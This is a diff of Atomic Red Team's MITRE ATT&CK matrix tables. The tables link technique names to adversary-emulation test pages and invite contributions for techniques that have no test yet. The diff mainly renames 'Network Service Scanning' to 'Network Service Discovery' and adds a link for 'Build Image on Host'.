| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
@@ -30,12 +30,12 @@
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
|
||||
@@ -40,7 +40,7 @@
|
||||
| | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Cloud Service Discovery](../../T1526/T1526.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [Inter-Process Communication](../../T1559/T1559.md) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Network Service Scanning](../../T1046/T1046.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery](../../T1518/T1518.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
|
||||
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Steal Application Access Token](../../T1528/T1528.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
@@ -112,7 +112,7 @@
|
||||
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Build Image on Host](../../T1612/T1612.md) | | | | | | | |
|
||||
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
|
||||
@@ -34,7 +34,7 @@
|
||||
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | [Encrypted Channel](../../T1573/T1573.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Indirect Command Execution](../../T1202/T1202.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Network Service Scanning](../../T1046/T1046.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
|
||||
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Indirect Command Execution](../../T1202/T1202.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
|
||||
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
